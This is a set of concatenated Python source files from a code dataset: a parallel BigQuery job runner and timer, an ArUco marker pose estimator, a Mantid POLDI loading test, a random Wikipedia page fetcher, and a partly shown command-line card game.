GoogleCredentials\nfrom subprocess import Popen, PIPE, CalledProcessError\nfrom datetime import datetime\nfrom time import sleep\n\n# [START load_commands]\ndef load_commands(filename):\n f = open(filename, 'r')\n \n com_id = 1\n for line in f:\n #Ignore the 
line that gives an example of the format to be used in the file\n if (line[:1] == \"#\"):\n continue \n \n commandComponents = (line[:-1] if line.endswith('\\n') else line).split(';')\n if (len(commandComponents) != 3):\n output_log(\"ERROR: The format of the file doesn't match the expected format, please follow the categoy;number;command format\", \"true\", 40)\n sys.exit()\n \n num_of_executions = int(commandComponents[1]) * int(multiplier)\n \n #Add in duplicate commands up to the number of executions passed in the file \n for i in range(0, num_of_executions):\n \n #if we are running BQ command \n if commandComponents[2].find(\"bq\") != -1:\n command = commandComponents[2]\n bq_location = commandComponents[2].find(\"bq\")\n bq_end = bq_location + len(\"bq\") + 1 #include space in this\n command = command[:bq_end] + '--project_id ' + project_id + \" \" + command[bq_end:]\n \n if commandComponents[0].find(\"test\") != -1:\n command = commandComponents[2] + \" \" + str(random.randrange(0, 10, 1)) + \";echo 'done'\"\n \n c = Command(commandComponents[0].strip(), command)\n \n #Store the commands in the list to run\n commands.append(c);\n com_id += 1\n \n# [END load_commands]\n\n# [START run_jobs]\ndef run_jobs():\n\n #Iterate through all the commands\n for command in commands:\n \n #Split the command appropriately for Popen\n cmd = command.executable\n command_args, statement = extract_quoted_sql(cmd)\n \n output_log(\" | \", \"true\", 20)\n output_log(\" |--> \" + cmd, \"true\", 20)\n \n #Run each command in a process\n p = subprocess.Popen(command_args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n \n #Store the processes to check their output later\n processes.append(p)\n \n output_log(\"\\n\", \"true\", 20)\n# [END run_jobs]\n \n# [START extract_quoted_sql]\ndef extract_quoted_sql(cmd):\n \n #If we have a quote separating out a SQL statement in BQ\n #TODO BQ specific, or what does a hive call look like? 
deal with other tech checks here\n #TODO online, check kenneth email with US folks about hive CLI\n if cmd.find('\"') != -1:\n #First the double quote to extract the SQL statement\n first_quote = cmd.find('\"') + 1\n statement = cmd[first_quote:-1]\n \n #Break up the command options into list\n command_args = cmd[:first_quote - 1].split()\n command_args.append(statement)\n else:\n command_args = cmd.split()\n \n return command_args, statement\n# [END extract_quoted_sql]\n \n# [START wait_for_processes_and_start_pollers()]\ndef wait_for_processes_and_start_pollers():\n \n #FR: add in ability to only have X number of pollers spun up so that they don't exhaust a machine if too many jobs are running, have a pool and spin up more as needed\n # or maybe this FR is about using multiprocessing to call the inside code via separate thread -- making sure those threads have access to: project_id, jobs_run\n # it would have to use a thread pool otherwise I'd have tons of threads spinning up like crazy \n #Check the status of the bash shell processes, and get their output\n while len(processes) > 0:\n for p in processes:\n #When the process has completed and returned a success exit code\n if p.poll() == 0:\n out, err = p.communicate()\n \n command_end_time = int(round(time.time() * 1000)) \n str_command_end_time = str(datetime.now())\n #TODO BQ specific project, ID...\n job_id_newline = out.find(\"\\n\")\n out = out[:job_id_newline] #Remove the \\ns before printing \n job_id_location = out.find(project_id) + len(project_id) + 1\n job_id = out[job_id_location:]\n \n #TODO BQ specific, pass in the correct tech in here\n polling_processes.append(subprocess.Popen([\"python\", \"poller.py\", str(job_id), \"bq\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE))\n \n #Create a JobResult and start filling in the info\n jb = JobResult(job_id)\n jb.bash_start_time = commands_start_time\n jb.bash_end_time = command_end_time\n jb.bash_duration = int(command_end_time) - 
int(commands_start_time)\n jobs_run.append(jb)\n \n output_log(str_command_end_time + \" \" + str(out), \"true\", 20)\n processes.remove(p)\n \n output_log(\" \", \"true\", 20)\n output_log(\"Awaiting \" + str(len(polling_processes)) + \" BigQuery jobs to complete\", \"true\", 20)\n# [END wait_for_processes_and_start_pollers()]\n\n# [START wait_for_pollers()]\ndef wait_for_pollers():\n \n while len(polling_processes) > 0:\n for p in polling_processes:\n if p.poll() == 0:\n out, err = p.communicate()\n \n #If the process returns an output\n if out != None: \n polling_processes.remove(p)\n output_log(\" |--> waiting for \" + str(len(polling_processes)) + \" poller(s)\", \"true\", 20)\n \n #TODO BQ specific, response would be different\n #Process the JSON and look for the relevant information.\n parsedjson = json.loads(out)\n status = parsedjson['status']\n state = status['state']\n \n if(state == \"DONE\"):\n job_reference = parsedjson['jobReference']\n job_id = job_reference['jobId']\n \n #Create a new jobresult with the ID\n jb = JobResult(job_id);\n \n #But check for it in the jobs_running\n for job in jobs_run:\n if job.job_id == job_id:\n jb = job\n \n jb.status = state\n statistics = parsedjson['statistics']\n jb.bq_start_time = statistics['startTime']\n jb.bq_end_time = statistics['endTime']\n jb.bq_duration = int(jb.bq_end_time) - int(jb.bq_start_time)\n jb.bytes_processed = statistics['totalBytesProcessed']\n \n configuration = parsedjson['configuration']\n query = configuration['query']\n sql_statement = query['query']\n jb.query_executed = sql_statement\n \n jb.category = get_query_category(jb.query_executed)\n \n jobs_completed.append(jb)\n if jb in jobs_run: jobs_run.remove(jb)\n# [END wait_for_pollers()]\n\n# [START get_query_category(query)]\ndef get_query_category(query):\n for c in commands:\n ca, cq = extract_quoted_sql(c.executable)\n if cq == query:\n return c.category\n \n output_log(\"Somehow non of the loaded commands match the executed query 
here\", None, 30)\n# [END get_query_category(query)] \n \n# [START output_completed_jobs]\ndef output_completed_jobs():\n \n result_path = path + \"results/\" \n \n output_filename = output_file + \"-results.csv\"\n output_filename = os.path.join(result_path, output_filename)\n \n if not os.path.exists(result_path):\n os.makedirs(result_path)\n \n file_exists = False\n try:\n #If it doesn't throw an error to read, then the file exists; otherwise, create a new file\n f = open(output_filename, 'r')\n #If soo, load it to append\n f = open(output_filename, 'a')\n #And then we know the file already existed\n file_exists = True \n except IOError as detail:\n if str(detail).find(\"No such file or directory\"):\n try:\n f = open(output_filename, 'wt')\n except IOError:\n output_log(\"Can not open file to write, check the script's permissions in this directory\", \"true\", 40)\n f.close()\n \n try:\n writer = csv.writer(f)\n \n if(not file_exists):\n writer.writerow( ('Status', 'BQ Job Duration', 'Bash Job Duration', 'Bytes Processed', 'BQ Job Start Time', 'BQ Job End Time' , \\\n 'Bash Job Start Time', 'Bash Job End Time', 'Category', 'Query', 'Job Id') )\n \n for job in jobs_completed:\n writer.writerow( (job.status, job.bq_duration, job.bash_duration, human_readable_bytes(int(job.bytes_processed)), \\\n date_time_from_milliseconds(job.bq_start_time), date_time_from_milliseconds(job.bq_end_time), \\\n date_time_from_milliseconds(job.bash_start_time), date_time_from_milliseconds(job.bash_end_time), \\\n job.category, job.query_executed, job.job_id) )\n\n finally:\n f.close()\n \n for i in range(0, len(jobs_completed)):\n output_log(jobs_completed[i].print_jobresult_details(), \"true\", 20) \n# [END output_completed_jobs]\n\n# [START output_log()]\ndef output_log(message, _print, level): \n if( _print == \"true\" and no_console_output != True):\n print(message)\n \n logging.log(level, message)\n \n# [END output_log()]\n\n#Class\nclass Command:\n \"\"\"The command object to 
be used for loading the queries to be run\"\"\"\n category = \"\"\n executable = \"\"\n \n def __init__(self, category, command):\n self.category = category\n self.executable = command\n \n def print_command_details(self):\n print('Command with category[' + self.category + '] timesToExecute[' + str(self.timesToExecute) + '] \\n--> executable[' + self.executable + '] ')\n#End Class\n\n#Class\nclass JobResult:\n \"\"\"The result details for each job run\"\"\"\n job_id = 0\n status = \"\"\n bq_start_time = \"\"\n bq_end_time = \"\"\n bq_duration = \"\"\n bash_start_time = \"\"\n bash_end_time = \"\"\n bash_duration = \"\"\n bytes_processed = \"\"\n category = \"\"\n query_executed = \"\"\n \n def __init__(self, job_id):\n self.job_id = job_id\n \n def print_jobresult_job_id(self):\n print('JobResult with job_id[' + self.job_id + ']')\n \n def print_jobresult_details(self):\n return 'JobResult with job_id[' + self.job_id + ']' + \"\\n\" + \\\n ' |--> status[' + self.status + ']' + \"\\n\" + \\\n ' |--> bq_duration[' + str(self.bq_duration) + '] bq_start_time[' + date_time_from_milliseconds(self.bq_start_time) + '] bq_end_time[' + date_time_from_milliseconds(self.bq_end_time) + ']' + \"\\n\" + \\\n ' |--> bash_duration[' + str(self.bash_duration) + '] bash_start_time[' + date_time_from_milliseconds(self.bash_start_time) + '] bash_end_time[' + date_time_from_milliseconds(self.bash_end_time) + ']' + \"\\n\" + \\\n ' |--> bytes_processed[' + human_readable_bytes(int(self.bytes_processed)) + '] category[' + str(self.category) + ']' + \"\\n\" + \\\n ' |--> query[' + str(self.query_executed) + ']'\n#End Class\n\ndef date_time_from_milliseconds(ms):\n s, ms = divmod(int(ms), 1000)\n return '%s.%03d' % (time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(s)), ms)\n\ndef human_readable_bytes(num, suffix='B'):\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\n if abs(num) < 1024.0:\n return \"%3.1f%s%s\" % (num, unit, suffix)\n num /= 1024.0\n return \"%.1f%s%s\" % (num, 'Yi', 
suffix) \n\n#Script defaults that can be set\ncommands_start_time = \"\"\ncommands = [] #Used to store the commands loaded from the file\njobs_run = [] #Used to store the job results of running jobs\njobs_completed = [] #Used to store the job results of jobs that have been confirmed completed.\nprocesses = [] #Used to store the processes launched in parallel to run all the commands\npolling_processes = [] #Used to store the processes running the pollers for each job\npath=\"runs/\"\n \n# [START run]\ndef main(commandsFile):\n load_commands(commandsFile)\n output_log(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++\", \"true\", 20)\n output_log(\"Run with configuration: \", \"true\", 20)\n output_log(\" |--> command_file: \" + commandsFile, \"true\", 20)\n output_log(\" |--> project_id: \" + project_id, \"true\", 20)\n output_log(\" |--> multiplier: \" + multiplier, \"true\", 20)\n output_log(\" |--> run id: \" + run_id, \"true\", 20)\n output_log(\"--------------------------------------------------------\\n\\n\", \"true\", 20)\n output_log(str(datetime.now()) + \" -- Starting parallel bash scripts: \", \"true\", 20)\n \n #Get the start time of all commands\n global commands_start_time\n commands_start_time = int(round(time.time() * 1000))\n \n run_jobs()\n wait_for_processes_and_start_pollers()\n wait_for_pollers()\n \n output_log(\"\\n--------------------------------------------------------\", \"true\", 20)\n output_log(str(datetime.now()) + \" -- Job Results\", \"true\", 20)\n output_log(\"--------------------------------------------------------\\n\", \"true\", 20)\n output_completed_jobs();\n output_log(\"\\n--------------------------------------------------------\\n\", \"true\", 20)\n output_log(\"End of run with id: \" + run_id, \"true\", 20)\n output_log(\"++++++++++++++++++++++++++++++++++++++++++++++++++++++++\\n\\n\", \"true\", 20)\n\n# [END run] \n \n# [START main]\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n 
description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument('commandsFile', help='Delimited file containing the commands to run.')\n parser.add_argument('project_id', help='Project ID to use.', default=\"nsaad-demos\")\n parser.add_argument('output_file', nargs=\"?\", help='Name of the file to use to output the log/results.', default=datetime.now().strftime(\"%Y-%m-%d-%H-%M\"))\n parser.add_argument('multiplier', nargs=\"?\", help='A multiplier to be used to increase the executes of the commands by that multiplier.')\n parser.add_argument('-nco', '--no_console_output', action='store_true', help='A multiplier to be used to increase the executes of the commands by that multiplier.')\n \n args = parser.parse_args()\n \n #Set the global variables from the params\n global project_id, output_file, multiplier, no_console_output, run_id\n project_id = args.project_id\n output_file = args.output_file\n \n #Set up the logging\n log_path = path + \"logs/\" \n output_filename = os.path.join(log_path, output_file)\n \n if not os.path.exists(log_path):\n os.makedirs(log_path)\n \n logging.basicConfig(filename=output_filename + '-output.log', level=logging. 
DEBUG)\n \n #Set the correct \"no console output\" value\n no_console_output = args.no_console_output\n\n #Set a default value for multiplier to 1 if not passed in\n if (args.multiplier):\n multiplier = args.multiplier\n else: \n multiplier = 1\n \n #ID just to distinguish between different runs of this script if run via the query_load_over_time script\n run_id = str(args.commandsFile) + \"-\" + str(project_id) + \"-\" + multiplier\n \n main(\n args.commandsFile)\n# [END main]","sub_path":"multi_queries.py","file_name":"multi_queries.py","file_ext":"py","file_size_in_byte":17247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"199108428","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 13 13:23:18 2021\r\n\r\n@author: pmrda\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport cv2,glob\r\nimport cv2.aruco as aruco\r\n\r\n'''\r\n# 종료 기준(termination criteria)를 정한다.\r\ncriteria = (cv2.TERM_CRITERIA_EPS+cv2.TERM_CRITERIA_MAX_ITER, 30 ,0.001)\r\n\r\n# Object Point(3D)를 준비한다. (0,0,0),(1,0,0),(2,0,0)... 
처럼\r\nobjp = np.zeros((6*8,3),np.float32)\r\n# np,mgrid[0:7,0:6]으로 (2,7,6) 배열 생성\r\n# Transpose 해줘서 (6,7,2)로, reshpae(-1,2)로 flat 시켜서 (42,2)로 변환\r\nobjp[:,:2] = np.mgrid[0:8,0:6].T.reshape(-1,2)\r\n\r\n# 이미지로 부터의 Object point와 Image points를 저장하기 위한 배열\r\nobjpoints = [] # 실제 세계의 3D 점들 \r\nimgpoints = [] # 2D 이미지의 점들\r\n\r\n# 전체 path를 받기 위해 os말고 glob 사용\r\nimages = glob.glob('C:/Users/pmrda/Desktop/calibration/*.png')\r\n\r\nfor name in images:\r\n img = cv2.imread(name)\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n # 체스판의 코너들 찾기\r\n ret, corners = cv2.findChessboardCorners(gray,(8,6),None)\r\n\r\n # 찾았으면, Object points, Image points 추가하기 (이후에 수정한다)\r\n if ret == True:\r\n objpoints.append(objp)\r\n\r\n corners2 = cv2.cornerSubPix(gray,corners,(11,11),(-1,-1),criteria)\r\n imgpoints.append(corners2)\r\n\r\n # 코너를 그리고 봐보자\r\n img = cv2.drawChessboardCorners(img,(8,6),corners2,ret)\r\n cv2.imshow('img',img)\r\n cv2.waitKey(2000)\r\n \r\ncv2.destroyAllWindows()\r\n\r\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1],None,None)\r\n\r\n#camera matrix & distortion coeff 확인\r\nprint(\"camera matrix\") \r\nprint(mtx) \r\nprint(\"distortion coeff\") \r\nprint(dist) \r\n'''\r\n\r\n#camera matrix & distortion \r\nmtx = np.array([[574.94769264 , 0. , 304.45999329],\r\n [ 0. , 580.99846129 ,230.35481223]\r\n ,[ 0. , 0. , 1. 
]])\r\n\r\ndist = np.array([[ 0.02423695 , 0.08291847 ,-0.00184008 ,-0.00187223, -0.3784548 ]])\r\n\r\ndef track(matrix_coefficients, distortion_coefficients):\r\n while True:\r\n frame = cv2.imread('00001_image.png')\r\n # operations on the frame come here\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # Change grayscale\r\n aruco_dict = aruco.Dictionary_get(aruco.DICT_4X4_50) # Use 5x5 dictionary to find markers\r\n parameters = aruco.DetectorParameters_create() # Marker detection parameters\r\n # lists of ids and the corners beloning to each id\r\n corners, ids, rejected_img_points = aruco.detectMarkers(gray, aruco_dict,\r\n parameters=parameters,\r\n cameraMatrix=matrix_coefficients,\r\n distCoeff=distortion_coefficients)\r\n if np.all(ids is not None): # If there are markers found by detector\r\n for i in range(0, len(ids)): # Iterate in markers\r\n # Estimate pose of each marker and return the values rvec and tvec---different from camera coefficients\r\n rvec, tvec, markerPoints = aruco.estimatePoseSingleMarkers(corners[i], 0.02, matrix_coefficients,\r\n distortion_coefficients)\r\n (rvec - tvec).any() # get rid of that nasty numpy value array error\r\n aruco.drawDetectedMarkers(frame, corners) # Draw A square around the markers\r\n aruco.drawAxis(frame, matrix_coefficients, distortion_coefficients, rvec, tvec, 0.01) # Draw Axis\r\n # Display the resulting frame\r\n cv2.imshow('frame', frame)\r\n # Wait 3 milisecoonds for an interaction. 
Check the key and do the corresponding job.\r\n key = cv2.waitKey(3) & 0xFF\r\n if key == ord('q'): # Quit\r\n break\r\n \r\n # When everything done, release the capture\r\n cv2.destroyAllWindows()\r\n \r\ntrack(mtx,dist)","sub_path":"aruco_pose.py","file_name":"aruco_pose.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"25515742","text":"# pylint: disable=no-init,invalid-name,bare-except\nimport stresstesting\nfrom mantid.simpleapi import *\nfrom mantid.api import *\nimport numpy as np\n\n\nclass POLDILoadRunsTest(stresstesting.MantidStressTest):\n \"\"\"This assembly of test cases checks that the behavior of PoldiLoadRuns is correct.\"\"\"\n\n def runTest(self):\n self.loadSingleWorkspace()\n self.loadMultipleSingleWorkspaces()\n self.loadWorkspacesMergeTwo()\n self.loadWorkspacesMergeTwoReverse()\n self.loadWorkspacesNotFound()\n\n self.loadWorkspacesAddToGroup()\n self.loadWorkspacesOverwriteGroup()\n self.loadWorkspacesDontOverwriteOther()\n self.loadWorkspacesOverwriteOther()\n\n self.checkRemoveBadDetectors()\n self.check2015PoldiData()\n\n def loadSingleWorkspace(self):\n singleWs = PoldiLoadRuns(2013, 6904)\n\n self.assertTrue(issubclass(type(singleWs), WorkspaceGroup))\n self.assertTrue(singleWs.contains(\"singleWs_data_6904\"))\n\n self.clearAnalysisDataService()\n\n def loadMultipleSingleWorkspaces(self):\n multipleSingleWs = PoldiLoadRuns(2013, 6903, 6904)\n\n self.assertTrue(issubclass(type(multipleSingleWs), WorkspaceGroup))\n self.assertEquals(len(multipleSingleWs.getNames()), 2)\n\n self.clearAnalysisDataService()\n\n def loadWorkspacesMergeTwo(self):\n twoWorkspacesMerged = PoldiLoadRuns(2013, 6903, 6904, 2)\n\n self.assertTrue(issubclass(type(twoWorkspacesMerged), WorkspaceGroup))\n\n wsNames = twoWorkspacesMerged.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"twoWorkspacesMerged_data_6904\")\n\n 
self.clearAnalysisDataService()\n\n def loadWorkspacesMergeTwoReverse(self):\n twoWorkspacesMergedReversed = PoldiLoadRuns(2013, 6904, 6903, 2)\n\n self.assertTrue(issubclass(type(twoWorkspacesMergedReversed), WorkspaceGroup))\n\n wsNames = twoWorkspacesMergedReversed.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"twoWorkspacesMergedReversed_data_6904\")\n\n PoldiLoadRuns(2013, 6903, 6904, 2, OutputWorkspace=\"twoWorkspacesMerged\")\n\n wsMergedReversed = AnalysisDataService.retrieve(\"twoWorkspacesMergedReversed_data_6904\")\n wsMerged = AnalysisDataService.retrieve(\"twoWorkspacesMerged_data_6904\")\n\n self.compareWorkspaces(wsMergedReversed, wsMerged)\n\n self.clearAnalysisDataService()\n\n def loadWorkspacesMergeThreeNotWorking(self):\n try:\n PoldiLoadRuns(2013, 6903, 6904, 3, OutputWorkspace=\"threeWorkspacesFail\")\n self.assertTrue(False)\n except:\n self.assertTrue(True)\n\n def loadWorkspacesNotFound(self):\n try:\n PoldiLoadRuns(1990, 6903, OutputWorkspace=\"notFound\")\n self.assertTrue(False)\n except:\n self.assertTrue(True)\n\n def loadWorkspacesAddToGroup(self):\n wsGroup = PoldiLoadRuns(2013, 6903)\n\n wsNames = wsGroup.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"wsGroup_data_6903\")\n\n wsGroup = PoldiLoadRuns(2013, 6904, OverwriteExistingWorkspace=False)\n\n wsNames = wsGroup.getNames()\n self.assertEquals(len(wsNames), 2)\n self.assertEquals(wsNames[0], \"wsGroup_data_6903\")\n self.assertEquals(wsNames[1], \"wsGroup_data_6904\")\n\n self.clearAnalysisDataService()\n\n def loadWorkspacesOverwriteGroup(self):\n wsGroup = PoldiLoadRuns(2013, 6903)\n\n wsNames = wsGroup.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"wsGroup_data_6903\")\n\n wsGroup = PoldiLoadRuns(2013, 6904, OverwriteExistingWorkspace=True)\n\n wsNames = wsGroup.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"wsGroup_data_6904\")\n\n def 
loadWorkspacesOverwriteOther(self):\n otherWs = CreateWorkspace(1.0, 1.0)\n\n self.assertTrue(issubclass(type(otherWs), Workspace))\n\n otherWs = PoldiLoadRuns(2013, 6904, OverwriteExistingWorkspace=True)\n\n self.assertTrue(issubclass(type(otherWs), WorkspaceGroup))\n wsNames = otherWs.getNames()\n self.assertEquals(len(wsNames), 1)\n self.assertEquals(wsNames[0], \"otherWs_data_6904\")\n\n def loadWorkspacesDontOverwriteOther(self):\n otherWs = CreateWorkspace(1.0, 1.0)\n\n self.assertTrue(issubclass(type(otherWs), Workspace))\n\n otherWs = PoldiLoadRuns(2013, 6904, OverwriteExistingWorkspace=False)\n\n self.assertTrue(issubclass(type(otherWs), Workspace))\n\n def checkRemoveBadDetectors(self):\n # Determine bad detectors automatically\n PoldiLoadRuns(2013, 6903, 6904, 2, MaskBadDetectors=True,\n BadDetectorThreshold=2.5,\n OutputWorkspace='twoWorkspacesMerged')\n\n wsMerged = AnalysisDataService.retrieve(\"twoWorkspacesMerged_data_6904\")\n self.assertEquals(len([True for x in range(wsMerged.getNumberHistograms()) if wsMerged.getDetector(\n x).isMasked()]), 36)\n\n self.clearAnalysisDataService()\n\n # Lower threshold, more excluded detectors\n PoldiLoadRuns(2013, 6903, 6904, 2, MaskBadDetectors=True,\n BadDetectorThreshold=2.0,\n OutputWorkspace='twoWorkspacesMerged')\n\n wsMerged = AnalysisDataService.retrieve(\"twoWorkspacesMerged_data_6904\")\n self.assertEquals(len([True for x in range(wsMerged.getNumberHistograms()) if wsMerged.getDetector(\n x).isMasked()]), 49)\n\n self.clearAnalysisDataService()\n\n # Only use those from the IDF\n PoldiLoadRuns(2013, 6903, 6904, 2, MaskBadDetectors=False,\n OutputWorkspace='twoWorkspacesMerged')\n\n wsMerged = AnalysisDataService.retrieve(\"twoWorkspacesMerged_data_6904\")\n self.assertEquals(len([True for x in range(wsMerged.getNumberHistograms()) if wsMerged.getDetector(\n x).isMasked()]), 12)\n\n self.clearAnalysisDataService()\n\n def check2015PoldiData(self):\n PoldiLoadRuns(2015, 977, OutputWorkspace='ws')\n\n 
ws2015 = AnalysisDataService.retrieve('ws_data_977')\n self.assertEquals(ws2015.getNumberHistograms(), 400)\n self.assertEquals(len(ws2015.readX(0)), 125)\n self.assertTrue(ws2015.run().hasProperty('chopperspeed'))\n\n self.clearAnalysisDataService()\n\n\n\n def compareWorkspaces(self, left, right):\n for i in range(left.getNumberHistograms()):\n self.assertTrue(np.array_equal(left.dataY(i), right.dataY(i)))\n\n def clearAnalysisDataService(self):\n AnalysisDataService.clear()\n","sub_path":"Testing/SystemTests/tests/analysis/POLDILoadRunsTest.py","file_name":"POLDILoadRunsTest.py","file_ext":"py","file_size_in_byte":6692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"358964839","text":"import bs4\nimport requests\nfrom openpyxl import Workbook\n\nwb = Workbook()\n\nheaders = {\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\", \"Accept-Encoding\":\"gzip, deflate\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"DNT\":\"1\",\"Connection\":\"close\",\n \"Upgrade-Insecure-Requests\":\"1\"\n }\nurl ='https://en.wikipedia.org/wiki/Special:Random'\n\nwhile True:\n response = requests.get(url, headers=headers) #get url\n soup = bs4.BeautifulSoup(response.content, \"lxml\") #get page content\n\n wikiName = soup.find('h1', attrs={'class':'firstHeading'}).text.strip() #get page title\n print('-'*50)\n print('Title: ', wikiName)\n print('Link: ', response.url)\n userChoice = input('\\nKeep randomizing wikipedias\\'s pages? 
(Y/N)').lower()\n if userChoice in 'n':\n break\n else:\n userChoice = ''\n\n\n","sub_path":"projetos simples/randomWikipediaArticle.py","file_name":"randomWikipediaArticle.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"539965927","text":"class Card:\n '''\n Class of a Card.\n Methods:\n - __init__(suit, number)\n - __str__()\n - compare(other)\n '''\n\n suit_list = ['Oro', 'Basto', 'Espada', 'Copa']\n number_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n\n def __init__(self, suit, number):\n if number == 1 or number == 2:\n self.number = number + 12 # from 1 to 2\n else:\n self.number = number # from 3 to 12\n\n self.suit = suit\n\n def __str__(self):\n if self.number > 12:\n name = self.suit_list[self.suit] + ' - ' + str(self.number - 12)\n else:\n name = self.suit_list[self.suit] + ' - ' + str(self.number)\n\n return name\n\n def compare(self, other):\n\n bool = -1\n if other.number == self.number:\n bool = 0\n elif self.number == 2 and self.suit_list(self.suit) == 'Oro':\n bool = 1\n elif other.number == 7:\n if self.number == 7 or self.number == 8:\n bool = 1\n else:\n bool = -1\n elif other.number == 10:\n if self.number <= 10:\n bool = 1\n else:\n bool = -1\n elif self.number >= other.number:\n bool = 1\n else:\n bool = -1\n\n return bool\n\n\nclass Deck:\n '''\n Class of Deck formed by cards.\n Methods:\n - __init__ (name = optional)\n - __add__card (card)\n - remove_card (card)\n - shuffle()\n - pop_card()\n - is_empty()\n - deal(hands, nCards = optional):\n '''\n\n def __init__(self):\n self.cards = []\n for suit in range(len(Card.suit_list)):\n for rank in range(1, len(Card.number_list) + 1):\n self.cards.append(Card(suit, rank))\n\n def __str__(self):\n s = \"\"\n for i in range(len(self.cards)):\n return str(self.cards[i]) + \"\\n\"\n\n return s\n\n def remove_card(self, card):\n if card in self.cards:\n self.cards.remove(card)\n return True\n 
else:\n return False\n\n def shuffle(self):\n import random\n nCards = len(self.cards)\n for i in range(nCards):\n j = random.randrange(i, nCards)\n self.cards[i], self.cards[j] = self.cards[j], self.cards[i]\n\n def pop_card(self):\n return self.cards.pop()\n\n def is_empty(self):\n return (len(self.cards) == 0)\n\n def deal(self, hands, nCards=999):\n nHands = len(hands)\n for i in range(nCards):\n if self.is_empty():\n break\n card = self.pop_card()\n hand = hands[i % nHands]\n hand.add_card(card)\n\n\nclass Hand(Deck):\n '''\n Class of Hand with the different actions (methods) that a player in a card game normally does.\n It receives as an input:\n - :param Deck:\n Methods:\n - __init__ (name = optional)\n - __add__card (card)\n - __str__\n - cards_to_play(other)\n '''\n def __init__(self, name=\"\"):\n self.cards = []\n self.name = name\n\n def add_card(self, card):\n self.cards.append(card)\n\n def __str__(self):\n s = \"\"\n p = 0\n for i in range(len(self.cards)):\n s = s + p * ' - ' + str(self.cards[i])\n p = 1\n return s\n\n def cards_to_play(self, other):\n s = \"\"\n p = 0\n potential_play = []\n\n for i in range(len(self.cards)):\n\n card = self.cards[i]\n\n if other == '':\n s = s + p * ' || ' + '(' + str(i) + ') ' + str(card) + \" True \"\n p = 1\n potential_play.append(1)\n\n elif card.compare(other) == -1:\n s = s + p * ' || ' + '(' + str(i) + ') ' + str(card) + \" False \"\n p = 1\n potential_play.append(card.compare(other))\n\n elif card.compare(other) == 1:\n s = s + p * ' || ' + '(' + str(i) + ') ' + str(card) + \" True \"\n p = 1\n potential_play.append(card.compare(other))\n\n else:\n s = s + p * ' || ' + '(' + str(i) + ') ' + str(card) + \" False \"\n p = 1\n potential_play.append(card.compare(other))\n\n return [s, potential_play]\n\n\ndef start_game(Deck, Hand):\n '''\n The function start_game initialises the game by asking the number of players and dealing the deck among the players.\n :param Deck: Class of Deck\n :param Hand: Class of 
Hand\n The output:\n :return players_hand: Hands of the players. Each hand contains several cards.\n '''\n print('------------------------ THE CAPITALISTA GAME ------------------------\\n'\n 'Welcome to read the rules of the game go to capitalista code below or run help(capitalista) in the terminal.')\n print(' - Select the number of players: ')\n bool = False\n while bool == False:\n\n input_num = input()\n\n try:\n num_players = int(input_num)\n if num_players > 10:\n print('Select a reasonable number of players: ')\n else:\n bool = True\n break\n except:\n print('Introduce a correct number!')\n bool = False\n\n if bool == True:\n deck = Deck()\n\n players_hand = []\n\n for i in range(num_players):\n name = 'Player ' + str(i)\n players_hand.append(Hand(name))\n\n deck.deal(players_hand)\n\n return players_hand\n\n\ndef card_election(players_hand, card_table, id_player):\n '''\n The function card_election enables the player to choose between their different cards in their hand.\n Some cards could not be played depending on the value of card in the table.\n It receives as inputs:\n :param players_hand: List of the hands of each player (type List containing Hand objects)\n :param card_table: Card on the table that the player must overcome (type Card)\n :param id_player: Index indicating the player that will play (type )\n And the output variables:\n :return: A vector with:\n - potential(index): Value that indicates if the player has skipped their turn (-1), played a similar number (0) or another card that fulfills requirements (1) (type )\n - card_to_play: Card selected by the player\n '''\n print('It is the turn of ', players_hand[id_player].name, ':')\n [s, potentials] = players_hand[id_player].cards_to_play(card_table)\n print(s)\n print('---------------------------------------')\n print('Choose a possible election (enter N if you want to retire from this hand):')\n\n bool = False\n\n while bool == False:\n input_num = str(input())\n if input_num == 'N' or 
input_num == 'n':\n return [-1, card_table]\n else:\n try:\n index = int(input_num)\n if (potentials[index] == 1 or potentials[index] == 0) and index < len(potentials):\n card_to_play = players_hand[id_player].cards[index]\n bool = True\n\n print(' ====> ', players_hand[id_player].name, ' played ', card_to_play)\n\n print('--------------------------------------')\n print(' - Card in the Table: ', card_to_play)\n\n return [potentials[index], card_to_play]\n else:\n print(' Enter a possible index to play!')\n except:\n print(' Enter a number please')\n\n\ndef next_player (players_on_round, id_player_ant, increment):\n '''\n The function next_player determines the following player that will play in this round.\n Note that some players could have retired in this round so they cannot play during this round.\n It receives as inputs:\n :param players_on_round: Vector with a boolean of the players still playing on this round (type )\n :param id_player_ant: Index of the player that was playing during this round (type )\n :param increment: Number of players minus 1 that cannot 